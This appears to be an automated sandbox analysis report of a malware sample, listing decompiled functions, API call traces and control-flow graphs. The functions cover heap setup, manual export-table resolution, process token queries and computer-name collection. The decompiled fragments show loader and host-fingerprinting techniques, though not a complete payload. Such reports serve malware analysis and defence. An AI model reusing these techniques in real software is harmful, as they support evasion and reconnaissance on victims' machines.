      • Part of subcall function 012A1B3F: RtlAllocateHeap.NTDLL(00000000,00000800,012AA03C), ref: 012A1B54
      • Part of subcall function 012A1B3F: HeapFree.KERNEL32(00000000,?,012AB2A0), ref: 012A1BAB
      • Part of subcall function 012A19E0: lstrlenW.KERNEL32(00000000,00000000,00000000,00000800,00001000,?,?,?,?,00000001,?,012AA03C,00000000,00000000), ref: 012A1AD1
    • HeapFree.KERNEL32(00000000,?), ref: 012A1DBF
    • CloseHandle.KERNEL32(?), ref: 012A1DCF
      • Part of subcall function 012A45F0: RtlEnterCriticalSection.NTDLL(012AB26C), ref: 012A45F9
      • Part of subcall function 012A45F0: Sleep.KERNEL32(0000000A,?,012A1D8F,00000002,?,?), ref: 012A4603
      • Part of subcall function 012A45F0: RtlLeaveCriticalSection.NTDLL(012AB26C), ref: 012A4636
    • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 012A1E1B
    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 012A1E41
      • Part of subcall function 012A1C40: GetModuleHandleA.KERNEL32(012AC0EA,?,012ACA6A,00000014,?,012AA03C,00000000,?,?,?,012A1D55), ref: 012A1C71
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,012A1F47), ref: 012A1E56
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    Function 012A39EB, Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 104memorystring

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 215 12a39eb-12a3a2a lstrcpyn 216 12a3a2c-12a3a31 215->216 217 12a3a3d-12a3a41 216->217 218 12a3a33-12a3a39 216->218 220 12a3a43-12a3a45 217->220 221 12a3a47-12a3a49 217->221 218->217 219 12a3a3b 218->219 219->217 220->216 220->221 222 12a3a4f-12a3a54 221->222 223 12a3b04 221->223 225 12a3a5a-12a3a5e 222->225 226 12a3afb-12a3b02 222->226 224 12a3b0b-12a3b12 223->224 225->226 227 12a3a64-12a3a92 VirtualAlloc 225->227 226->224 228 12a3af2-12a3af9 227->228 229 12a3a94-12a3ac8 call 12a274b 227->229 228->224 232 12a3aca-12a3ad9 memcpy 229->232 233 12a3adb 229->233 234 12a3ae2-12a3af0 VirtualFree 232->234 233->234 234->224
    APIs
    • lstrcpyn.KERNEL32(00000000,012AA26C,00000008,00000000), ref: 012A3A10
    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 012A3A88
    • memcpy.NTDLL(?,00000000,?,?,?,00000001), ref: 012A3AD1
    • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,00000001), ref: 012A3AEA
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    Function 012A4F8D, Relevance: 9.1, APIs: 6, Instructions: 139memory

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 247 12a4f8d-12a4fd6 SysAllocString 248 12a50de-12a50e1 247->248 249 12a4fdc-12a5008 247->249 250 12a50ec-12a50ef 248->250 251 12a50e3-12a50e6 SafeArrayDestroy 248->251 255 12a50db 249->255 256 12a500e-12a501a call 12a4f30 249->256 253 12a50fa-12a5100 250->253 254 12a50f1-12a50f4 SysFreeString 250->254 251->250 254->253 255->248 256->255 259 12a5020-12a5030 256->259 259->255 261 12a5036-12a5054 259->261 261->255 264 12a505a-12a506c ObjectStublessClient10 261->264 265 12a506e-12a5071 264->265 266 12a50a1-12a50ac call 12a4cf9 264->266 265->266 267 12a5073-12a5083 StrStrIW 265->267 271 12a50b1-12a50b5 266->271 269 12a5098-12a509b SysFreeString 267->269 270 12a5085-12a508e call 12a4db8 267->270 269->266 270->269 278 12a5090-12a5093 call 12a4f30 270->278 272 12a50d2-12a50d7 271->272 273 12a50b7-12a50bc 271->273 272->255 275 12a50be-12a50cb 273->275 276 12a50cd 273->276 275->272 276->272 278->269
    APIs
    • SysAllocString.OLEAUT32(?), ref: 012A4FCB
    • ObjectStublessClient10.OLE32(?,?), ref: 012A5064
    • StrStrIW.SHLWAPI(?,012AC000), ref: 012A507B
    • SysFreeString.OLEAUT32(?), ref: 012A509B
      • Part of subcall function 012A4DB8: SysAllocString.OLEAUT32(012AA280), ref: 012A4E00
      • Part of subcall function 012A4DB8: lstrcmpW.KERNEL32(00000000,012AC068), ref: 012A4ECF
      • Part of subcall function 012A4CF9: ObjectStublessClient10.OLE32(?,?,00000000,?,00000000,012A50B1,?,00000008), ref: 012A4D0F
      • Part of subcall function 012A4CF9: Sleep.KERNEL32(000000C8), ref: 012A4D27
      • Part of subcall function 012A4CF9: lstrlenW.KERNEL32(?), ref: 012A4D5D
      • Part of subcall function 012A4CF9: memcpy.NTDLL(00000000,?,?,?), ref: 012A4D7E
      • Part of subcall function 012A4CF9: SysFreeString.OLEAUT32(?), ref: 012A4D92
    • SafeArrayDestroy.OLEAUT32(?), ref: 012A50E6
    • SysFreeString.OLEAUT32(?), ref: 012A50F4
      • Part of subcall function 012A4F30: Sleep.KERNELBASE(000001F4), ref: 012A4F75
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    Function 00401C4A, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31libraryloader

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 299 401c4a-401c60 300 401c62-401c85 GetModuleHandleA GetProcAddress 299->300 301 401c87-401c89 299->301 300->301 302 401c99-401c9e 300->302 301->302 303 401c8b-401c94 IsWow64Process 301->303 303->302 304 401c96 303->304 304->302
    C-Code - Quality: 58%
    			E00401C4A(void* __ecx) {
				signed int _v8;
				_Unknown_base(*)()* _t7;
				signed int _t9;
				struct HINSTANCE__* _t10;
				intOrPtr _t14;

				_t7 =  *0x4054c0;
				_v8 = _v8 & 0x00000000;
				_t14 =  *0x405474; // 0xcc
				if(_t7 != 0) {
					L2:
					if(_t14 != 0) {
						_t9 =  *_t7(_t14,  &_v8); // executed
						if(_t9 == 0) {
							_v8 = _v8 & _t9;
						}
					}
					L5:
					return _v8;
				}
				_t10 = GetModuleHandleA("KERNEL32.DLL");
				 *0x4054c8 = _t10;
				_t7 = GetProcAddress(_t10, "IsWow64Process");
				 *0x4054c0 = _t7;
				if(_t7 == 0) {
					goto L5;
				}
				goto L2;
			}








    0x00401c4e
    0x00401c53
    0x00401c5a
    0x00401c60
    0x00401c87
    0x00401c89
    0x00401c90
    0x00401c94
    0x00401c96
    0x00401c96
    0x00401c94
    0x00401c99
    0x00401c9e
    0x00401c9e
    0x00401c67
    0x00401c73
    0x00401c78
    0x00401c80
    0x00401c85
    0x00000000
    0x00000000
    0x00000000

    APIs
    • GetModuleHandleA.KERNEL32(KERNEL32.DLL,0000000C,?,?,004010E8,?,00000000), ref: 00401C67
    • GetProcAddress.KERNEL32(00000000,IsWow64Process,?,?,004010E8,?,00000000), ref: 00401C78
    • IsWow64Process.KERNELBASE(000000CC,00000000,0000000C,?,?,004010E8,?,00000000), ref: 00401C90
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd
    Function 012A4CF9, Relevance: 7.6, APIs: 5, Instructions: 76sleepstring

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 305 12a4cf9-12a4d17 ObjectStublessClient10 306 12a4dae-12a4db5 305->306 307 12a4d1d-12a4d20 305->307 308 12a4d3a-12a4d3d 307->308 309 12a4d22-12a4d37 Sleep 307->309 308->306 310 12a4d3f-12a4d44 308->310 309->308 312 12a4da1-12a4dac 310->312 313 12a4d46-12a4d58 310->313 312->306 315 12a4d5a-12a4d67 lstrlenW 313->315 316 12a4d98-12a4d9d 313->316 315->316 317 12a4d69-12a4d77 call 12a1000 315->317 316->312 320 12a4d88 317->320 321 12a4d79-12a4d86 memcpy 317->321 322 12a4d8f-12a4d92 SysFreeString 320->322 321->322 322->316
    APIs
    • ObjectStublessClient10.OLE32(?,?,00000000,?,00000000,012A50B1,?,00000008), ref: 012A4D0F
    • Sleep.KERNEL32(000000C8), ref: 012A4D27
    • lstrlenW.KERNEL32(?), ref: 012A4D5D
      • Part of subcall function 012A1000: RtlAllocateHeap.NTDLL(00000000,?,012A3BE8), ref: 012A100C
    • memcpy.NTDLL(00000000,?,?,?), ref: 012A4D7E
    • SysFreeString.OLEAUT32(?), ref: 012A4D92
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    Function 012A102A, Relevance: 7.6, APIs: 5, Instructions: 56memorylibraryloader

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 323 12a102a-12a1044 HeapCreate 324 12a104e-12a1063 GetTickCount call 12a3887 323->324 325 12a1046-12a1049 323->325 326 12a10d0-12a10d2 324->326 329 12a1065-12a106f call 12a39eb 324->329 325->326 329->326 332 12a1071-12a1082 329->332 333 12a10a9-12a10ab 332->333 334 12a1084-12a10a7 GetModuleHandleA GetProcAddress 332->334 335 12a10bb-12a10bf 333->335 336 12a10ad-12a10b6 IsWow64Process 333->336 334->333 334->335 338 12a10cb call 12a1e67 335->338 339 12a10c1 335->339 336->335 337 12a10b8 336->337 337->335 338->326 339->338
    APIs
    • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 012A1037
    • GetTickCount.KERNEL32 ref: 012A104E
      • Part of subcall function 012A3887: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,012A1061,?), ref: 012A388F
      • Part of subcall function 012A3887: GetVersion.KERNEL32 ref: 012A389E
      • Part of subcall function 012A3887: GetCurrentProcessId.KERNEL32 ref: 012A38B5
      • Part of subcall function 012A3887: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 012A38D2
      • Part of subcall function 012A3887: GetLastError.KERNEL32 ref: 012A38F1
      • Part of subcall function 012A39EB: lstrcpyn.KERNEL32(00000000,012AA26C,00000008,00000000), ref: 012A3A10
      • Part of subcall function 012A39EB: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 012A3A88
      • Part of subcall function 012A39EB: memcpy.NTDLL(?,00000000,?,?,?,00000001), ref: 012A3AD1
      • Part of subcall function 012A39EB: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,00000001), ref: 012A3AEA
    • GetModuleHandleA.KERNEL32(012AC09F,?,?,?), ref: 012A1089
    • GetProcAddress.KERNEL32(00000000,012AC8AE,?,?,?), ref: 012A109A
    • IsWow64Process.KERNELBASE(012AB1E8,?,?,?,?), ref: 012A10B2
      • Part of subcall function 012A1E67: memset.NTDLL ref: 012A1EE4
      • Part of subcall function 012A1E67: RtlInitializeCriticalSection.NTDLL(012AB26C), ref: 012A1EF5
      • Part of subcall function 012A1E67: CoInitializeEx.OLE32(00000000,00000002), ref: 012A1F29
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    Function 00401000, Relevance: 7.5, APIs: 5, Instructions: 19memory

    Control-flow Graph

    C-Code - Quality: 100%
    			_entry_() {
				void* _t1;
				int _t4;
				int _t6;

				_t6 = 0;
				_t1 = HeapCreate(0, 0x400000, 0); // executed
				 *0x405440 = _t1;
				if(_t1 != 0) {
					 *0x405484 = GetModuleHandleA(0);
					GetCommandLineW(); // executed
					_t4 = E00401070(); // executed
					_t6 = _t4;
					HeapDestroy( *0x405440);
				}
				ExitProcess(_t6);
			}






    0x00401001
    0x0040100a
    0x00401012
    0x00401017
    0x00401020
    0x00401025
    0x0040102b
    0x00401036
    0x00401038
    0x00401038
    0x0040103f

    APIs
    • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 0040100A
    • GetModuleHandleA.KERNEL32(00000000), ref: 0040101A
    • GetCommandLineW.KERNEL32 ref: 00401025
      • Part of subcall function 00401070: GetCursorPos.USER32(?), ref: 0040109B
      • Part of subcall function 00401070: WaitForSingleObject.KERNEL32(00000040), ref: 004010A8
      • Part of subcall function 00401070: GetCursorPos.USER32(?), ref: 004010B7
      • Part of subcall function 00401070: GetCurrentThreadId.KERNEL32(?,?,736C6E70,?,00000000), ref: 004011A7
      • Part of subcall function 00401070: GetCurrentThread.KERNEL32(?,00000000), ref: 004011BA
      • Part of subcall function 00401070: GetLastError.KERNEL32(?,00000000), ref: 004011E2
      • Part of subcall function 00401070: ExitProcess.KERNEL32 ref: 004011F4
    • HeapDestroy.KERNEL32 ref: 00401038
    • ExitProcess.KERNEL32 ref: 0040103F
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd
    Function 00401C9F, Relevance: 6.1, APIs: 4, Instructions: 68file
    C-Code - Quality: 82%
    			E00401C9F(void* __ebx, void* __ecx, void* __edi, void* _a4) {
				CHAR* _v8;
				struct _OVERLAPPED* _v12;
				long _v16;
				void _v20;
				void* __esi;
				void* __ebp;
				void* _t16;
				void* _t18;
				void* _t23;
				long _t24;
				int _t28;
				long _t32;

				_t34 = __ecx;
				_v12 = 0;
				_t16 = E00402526(__ecx, __edi,  &_v8);
				_t37 = _t16;
				if(_t16 != 0) {
					L11:
					return _v12;
				}
				_push(0);
				_push(_a4);
				_push(__edi); // executed
				_t18 = E004027DB(__ebx, __edi, 0, _t37); // executed
				if(_t18 == 0) {
					L10:
					E0040105B(_v8);
					goto L11;
				}
				_push(__ebx);
				_t32 = E0040292D(__edi, _t34, _t18 - __edi);
				if(_t32 != 0) {
					_t23 = CreateFileA(_v8, 0x80000000, 1, 0, 3, 0x80, 0); // executed
					_a4 = _t23;
					if(_t23 != 0xffffffff) {
						_t24 = SetFilePointer(_t23, _t32, 0, 0); // executed
						if(_t24 == _t32) {
							_t28 = ReadFile(_a4,  &_v20, 4,  &_v16, 0); // executed
							if(_t28 != 0 && _v16 == 4) {
								_v12 = _v20 + __edi;
							}
						}
						CloseHandle(_a4);
					}
				}
				goto L10;
			}















    0x00401c9f
    0x00401cad
    0x00401cb0
    0x00401cb5
    0x00401cb7
    0x00401d43
    0x00401d48
    0x00401d48
    0x00401cbd
    0x00401cbe
    0x00401cc1
    0x00401cc2
    0x00401cc9
    0x00401d3b
    0x00401d3e
    0x00000000
    0x00401d3e
    0x00401ccd
    0x00401cd6
    0x00401cda
    0x00401cef
    0x00401cf8
    0x00401cfb
    0x00401d01
    0x00401d09
    0x00401d19
    0x00401d21
    0x00401d2e
    0x00401d2e
    0x00401d21
    0x00401d34
    0x00401d34
    0x00401cfb
    0x00000000

    APIs
      • Part of subcall function 00402526: GetModuleFileNameA.KERNEL32(?,00000000,00000104,00000208,00000000,00000000,?,?,00401CB5,00000000,?,0000007F), ref: 00402546
      • Part of subcall function 00402526: GetLastError.KERNEL32(?,?,00401CB5,00000000,?,0000007F,?,?,?,?,?,0040124C,LdrLoadDll), ref: 00402584
      • Part of subcall function 004027DB: lstrcmp.KERNEL32(?,?,00404108,0000002C,0040269B,774A0000,00000000,774E55E0,?,?,004010FB,?,00000000), ref: 004028A9
      • Part of subcall function 004027DB: lstrlenA.KERNEL32(?,00404108,0000002C,0040269B,774A0000,00000000,774E55E0,?,?,004010FB,?,00000000), ref: 004028B4
    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00401CEF
    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,0040124C,LdrLoadDll), ref: 00401D01
    • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 00401D19
    • CloseHandle.KERNEL32(?), ref: 00401D34
      • Part of subcall function 0040105B: HeapFree.KERNEL32(00000000,00000000,0040275E), ref: 00401067
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd
    Function 012A1E67, Relevance: 4.6, APIs: 3, Instructions: 91
    APIs
      • Part of subcall function 012A3B68: NtOpenProcess.NTDLL(00000000,00000400,?,012A1E91), ref: 012A3BAF
      • Part of subcall function 012A3B68: NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 012A3BC2
      • Part of subcall function 012A3B68: NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 012A3BDE
      • Part of subcall function 012A3B68: NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000,00000000), ref: 012A3BFB
      • Part of subcall function 012A3B68: memcpy.NTDLL(00000000,00000000,0000001C), ref: 012A3C08
      • Part of subcall function 012A3B68: NtClose.NTDLL(?), ref: 012A3C1A
      • Part of subcall function 012A3B68: NtClose.NTDLL(00000000), ref: 012A3C24
      • Part of subcall function 012A1000: RtlAllocateHeap.NTDLL(00000000,?,012A3BE8), ref: 012A100C
    • memset.NTDLL ref: 012A1EE4
    • RtlInitializeCriticalSection.NTDLL(012AB26C), ref: 012A1EF5
      • Part of subcall function 012A44A2: RtlAllocateHeap.NTDLL(00000000,?), ref: 012A44DF
      • Part of subcall function 012A44A2: HeapFree.KERNEL32(00000000,00000000), ref: 012A4510
      • Part of subcall function 012A44A2: GetComputerNameW.KERNEL32(00000000,?), ref: 012A451E
      • Part of subcall function 012A44A2: RtlAllocateHeap.NTDLL(00000000,?), ref: 012A4535
      • Part of subcall function 012A44A2: GetComputerNameW.KERNEL32(00000000,?), ref: 012A4546
      • Part of subcall function 012A44A2: HeapFree.KERNEL32(00000000,00000000), ref: 012A4567
      • Part of subcall function 012A1173: HeapFree.KERNEL32(00000000,?,00000008), ref: 012A1336
    • CoInitializeEx.OLE32(00000000,00000002), ref: 012A1F29
      • Part of subcall function 012A1CCE: CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 012A1CEF
      • Part of subcall function 012A1CCE: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 012A1D44
      • Part of subcall function 012A1CCE: HeapFree.KERNEL32(00000000,?), ref: 012A1DBF
      • Part of subcall function 012A1CCE: CloseHandle.KERNEL32(?), ref: 012A1DCF
      • Part of subcall function 012A1CCE: _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 012A1E1B
      • Part of subcall function 012A1CCE: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 012A1E41
      • Part of subcall function 012A1CCE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,012A1F47), ref: 012A1E56
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    Function 012A25A8, Relevance: 4.5, APIs: 3, Instructions: 49
    APIs
    • SafeArrayCreate.OLEAUT32(00000011,00000001,012AC9E8), ref: 012A25D0
    • memcpy.NTDLL(?,012A1C21,00000008), ref: 012A25EA
    • SafeArrayDestroy.OLEAUT32(012A1D55), ref: 012A2616
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    Function 012A21C4, Relevance: 3.1, APIs: 2, Instructions: 61com
    APIs
    • CoCreateInstance.OLE32(012AC0BC,00000000,00000001,012AC0CC,012A1D55), ref: 012A21DE
    • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 012A2215
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    Function 012A1B3F, Relevance: 3.1, APIs: 2, Instructions: 53memory
    APIs
    • RtlAllocateHeap.NTDLL(00000000,00000800,012AA03C), ref: 012A1B54
      • Part of subcall function 012A49C1: memcpy.NTDLL(00000000,00000084,00000084,?,00000000,00000008,?,?,012A1B86,?,?,?,012A1D8F,00000002,?,?), ref: 012A49E3
      • Part of subcall function 012A49C1: memset.NTDLL ref: 012A4A16
      • Part of subcall function 012A49C1: memcpy.NTDLL(?,?,00000000,00000000,?,?,00000000), ref: 012A4A30
      • Part of subcall function 012A45F0: RtlEnterCriticalSection.NTDLL(012AB26C), ref: 012A45F9
      • Part of subcall function 012A45F0: Sleep.KERNEL32(0000000A,?,012A1D8F,00000002,?,?), ref: 012A4603
      • Part of subcall function 012A45F0: RtlLeaveCriticalSection.NTDLL(012AB26C), ref: 012A4636
    • HeapFree.KERNEL32(00000000,?,012AB2A0), ref: 012A1BAB
      • Part of subcall function 012A4A4E: RtlQueryPerformanceFrequency.NTDLL(?), ref: 012A4AB7
      • Part of subcall function 012A4A4E: RtlQueryPerformanceCounter.NTDLL(?), ref: 012A4AC1
      • Part of subcall function 012A4A4E: _aulldiv.NTDLL(?,?,?,?), ref: 012A4AD3
      • Part of subcall function 012A4A4E: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 012A4B15
      • Part of subcall function 012A4A4E: RtlEnterCriticalSection.NTDLL(012AB26C), ref: 012A4B38
      • Part of subcall function 012A4A4E: RtlLeaveCriticalSection.NTDLL(012AB26C), ref: 012A4B56
      • Part of subcall function 012A4A4E: StrTrimA.SHLWAPI(00000000,012AA27C), ref: 012A4B8D
      • Part of subcall function 012A4A4E: wcstombs.NTDLL ref: 012A4C53
      • Part of subcall function 012A4A4E: HeapFree.KERNEL32(00000000,?,00000000), ref: 012A4CAB
      • Part of subcall function 012A4A4E: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 012A4CBB
      • Part of subcall function 012A4A4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 012A4CC9
      • Part of subcall function 012A4A4E: HeapFree.KERNEL32(00000000,?), ref: 012A4CD9
      • Part of subcall function 012A4A4E: HeapFree.KERNEL32(00000000,?), ref: 012A4CE9
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    Function 012A1129, Relevance: 3.0, APIs: 2, Instructions: 26
    APIs
    • InterlockedIncrement.KERNEL32(012AB1D4), ref: 012A113E
      • Part of subcall function 012A102A: HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 012A1037
      • Part of subcall function 012A102A: GetTickCount.KERNEL32 ref: 012A104E
      • Part of subcall function 012A102A: GetModuleHandleA.KERNEL32(012AC09F,?,?,?), ref: 012A1089
      • Part of subcall function 012A102A: GetProcAddress.KERNEL32(00000000,012AC8AE,?,?,?), ref: 012A109A
      • Part of subcall function 012A102A: IsWow64Process.KERNELBASE(012AB1E8,?,?,?,?), ref: 012A10B2
    • InterlockedDecrement.KERNEL32(012AB1D4), ref: 012A115E
      • Part of subcall function 012A10D5: SetEvent.KERNEL32(012AB200), ref: 012A10E0
      • Part of subcall function 012A10D5: SleepEx.KERNEL32(00000064,00000001), ref: 012A10EF
      • Part of subcall function 012A10D5: CloseHandle.KERNEL32(012AB200), ref: 012A1110
      • Part of subcall function 012A10D5: HeapDestroy.KERNEL32(012AB1D0), ref: 012A1120
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    Function 004027DB, Relevance: 2.6, APIs: 2, Instructions: 107string
    C-Code - Quality: 86%
    			E004027DB(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t56;
				intOrPtr* _t57;
				intOrPtr _t60;
				signed int _t61;
				CHAR* _t65;
				intOrPtr* _t77;
				intOrPtr _t79;
				CHAR* _t80;
				intOrPtr _t85;
				signed int _t88;
				signed short* _t90;
				void* _t94;
				void* _t95;
				void* _t108;

				_push(0x2c);
				_push(0x404108);
				E00402D2C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t95 - 0x24)) = 0;
				 *(_t95 - 4) = 0;
				_t85 =  *((intOrPtr*)(_t95 + 8));
				_t56 =  *((intOrPtr*)(_t85 + 0x3c)) + _t85;
				if( *((short*)(_t56 + 4)) != 0x14c) {
					_t57 = _t56 + 0x88;
				} else {
					_t57 = _t56 + 0x78;
				}
				_t94 =  *_t57 + _t85;
				if( *_t57 == 0 ||  *((intOrPtr*)(_t57 + 4)) == 0 ||  *((intOrPtr*)(_t94 + 0x1c)) == 0) {
					L27:
					 *(_t95 - 4) =  *(_t95 - 4) | 0xffffffff;
					return E00402D67( *((intOrPtr*)(_t95 - 0x24)));
				} else {
					_t60 =  *((intOrPtr*)(_t94 + 0x14));
					if(_t60 != 0) {
						_t79 =  *((intOrPtr*)(_t94 + 0x1c)) + _t85;
						 *((intOrPtr*)(_t95 - 0x34)) = _t79;
						_t88 =  *(_t95 + 0xc);
						 *(_t95 - 0x20) = _t88;
						if(_t88 == 0 || _t88 > 0xffff) {
							 *(_t95 - 0x20) = 0;
							_t60 =  *((intOrPtr*)(_t94 + 0x18));
						}
						 *((intOrPtr*)(_t95 - 0x2c)) = _t60;
						if( *((intOrPtr*)(_t94 + 0x24)) == 0) {
							_t61 =  *(_t95 - 0x20);
							if(_t61 != 0) {
								 *((intOrPtr*)(_t95 - 0x24)) = _t79 + _t61 * 4 - 4;
							}
							goto L27;
						}
						_t90 =  *((intOrPtr*)(_t94 + 0x24)) + _t85;
						 *(_t95 - 0x3c) = _t90;
						_t77 =  *((intOrPtr*)(_t94 + 0x20)) + _t85;
						 *((intOrPtr*)(_t95 - 0x38)) = _t77;
						 *(_t95 - 0x28) =  *(_t95 - 0x28) & 0x00000000;
						while( *(_t95 - 0x28) <  *((intOrPtr*)(_t95 - 0x2c))) {
							 *(_t95 - 0x1c) =  *(_t95 - 0x1c) & 0x00000000;
							if( *(_t95 - 0x20) == 0) {
								_t65 =  *_t77 + _t85;
								 *(_t95 - 0x30) = _t65;
								_t80 =  *(_t95 + 0xc);
								if(_t80 == 0) {
									E004029F9(lstrlenA(_t65),  *(_t95 - 0x30));
									L19:
									if(_t108 == 0) {
										 *(_t95 - 0x1c) = 1;
									}
									L21:
									if( *(_t95 - 0x1c) == 0) {
										_t77 = _t77 + 4;
										 *((intOrPtr*)(_t95 - 0x38)) = _t77;
										_t90 =  &(_t90[1]);
										 *(_t95 - 0x3c) = _t90;
										 *(_t95 - 0x28) =  *(_t95 - 0x28) + 1;
										_t85 =  *((intOrPtr*)(_t95 + 8));
										continue;
									}
									 *((intOrPtr*)(_t95 - 0x24)) =  *((intOrPtr*)(_t95 - 0x34)) + ( *_t90 & 0x0000ffff) * 4;
									if(0 != 0) {
										 *((intOrPtr*)(0)) =  *_t77 +  *((intOrPtr*)(_t95 + 8));
									}
									goto L27;
								}
								if( *_t65 !=  *_t80) {
									goto L21;
								}
								lstrcmpA(_t65, _t80); // executed
								goto L19;
							}
							_t108 =  *(_t95 - 0x20) - ( *_t90 & 0x0000ffff) +  *((intOrPtr*)(_t94 + 0x10));
							goto L19;
						}
					}
					goto L27;
				}
			}

















    0x004027db
    0x004027dd
    0x004027e2
    0x004027e9
    0x004027ec
    0x004027ef
    0x004027f5
    0x004027fd
    0x00402804
    0x004027ff
    0x004027ff
    0x004027ff
    0x0040280b
    0x0040280f
    0x0040291e
    0x0040291e
    0x0040292a
    0x00402827
    0x00402827
    0x0040282c
    0x00402835
    0x00402837
    0x0040283a
    0x0040283d
    0x00402842
    0x0040284c
    0x0040284f
    0x0040284f
    0x00402852
    0x00402858
    0x00402903
    0x00402908
    0x0040290e
    0x0040290e
    0x00000000
    0x00402908
    0x00402861
    0x00402863
    0x00402869
    0x0040286b
    0x0040286e
    0x00402872
    0x0040287e
    0x00402886
    0x00402895
    0x00402897
    0x0040289a
    0x0040289f
    0x004028bd
    0x004028c5
    0x004028c5
    0x004028c7
    0x004028c7
    0x004028ce
    0x004028d2
    0x004028ed
    0x004028f0
    0x004028f4
    0x004028f5
    0x004028f8
    0x004028fb
    0x00000000
    0x004028fb
    0x004028dd
    0x004028e2
    0x004028e9
    0x004028e9
    0x00000000
    0x004028e2
    0x004028a5
    0x00000000
    0x00000000
    0x004028a9
    0x00000000
    0x004028af
